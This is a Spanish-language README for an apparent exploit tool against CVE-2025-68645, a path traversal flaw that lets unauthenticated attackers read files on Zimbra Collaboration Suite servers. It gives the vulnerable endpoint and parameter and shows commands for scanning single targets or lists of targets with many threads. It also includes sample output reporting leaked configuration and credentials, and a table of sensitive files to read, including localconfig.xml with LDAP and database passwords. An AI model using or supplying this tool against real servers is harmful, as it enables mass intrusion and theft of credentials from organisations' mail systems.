
Zimbra Path Traversal (CVE-2025-68645) - Vulnerabilidad de lectura de archivos no autenticada en Zimbra Collaboration Suite
CVE-2025-68645 es una vulnerabilidad de path traversal en Zimbra Collaboration Suite que permite a atacantes no autenticados leer archivos arbitrarios del sistema de archivos del servidor.
/h/printconversations?javax.servlet.include.servlet_path=
| Impacto | Severidad |
|---|---|
| Lectura de archivos sin autenticación | 🔴 Alto |
| Divulgación de configuración | 🔴 Alto |
| Filtración de credenciales | 🔴 Alto |
| Mapeo de red interna | 🟠 Medio |
python CVE-2025-68645.py.py -t https://target.zimbra.com
python CVE-2025-68645.py.py -l targets.txt -o results.json --threads 20
python CVE-2025-68645.py.py -t https://target.zimbra.com -v --timeout 30
Argumento Descripción Predeterminado -t, --target URL de un solo objetivo Ninguno -l, --list Archivo que contiene la lista de objetivos Ninguno -o, --output Nombre del archivo de salida results.json --threads Número de hilos concurrentes 10 --timeout Tiempo de espera de solicitud en segundos 15 -v, --verbose Habilitar salida detallada False --no-verify Deshabilitar verificación SSL False --read-all Leer todas las rutas sensibles False
[*] Scanning: https://target.zimbra.local [✓] VULNERABLE: https://target.zimbra.local [+] Extracted configuration: version: 220726130125 memcached: target.local:11211 httpsPort: 8443 httpPort: 8080 [+] Found: /WEB-INF/web.xml [+] Found: /opt/zimbra/conf/localconfig.xml [!] Possible credentials leaked in /WEB-INF/web.xml
============================================================ SCAN COMPLETE! Time elapsed: 1.02 seconds Total targets: 1 Vulnerable: 1 Not vulnerable: 0
| Ruta | Información Expuesta |
|---|
/WEB-INF/web.xml | Mapeos de servlets, restricciones de seguridad |
/WEB-INF/zcs.web.xml | Configuración específica de Zimbra |
/opt/zimbra/conf/localconfig.xml | Credenciales LDAP, contraseñas de base de datos |
/opt/zimbra/conf/ldap-config.xml | Configuración del servidor LDAP |
/opt/zimbra/conf/attrs/zimbra-attrs.xml | Atributos del sistema |
/WEB-INF/classes/logging.properties | Configuración de logging |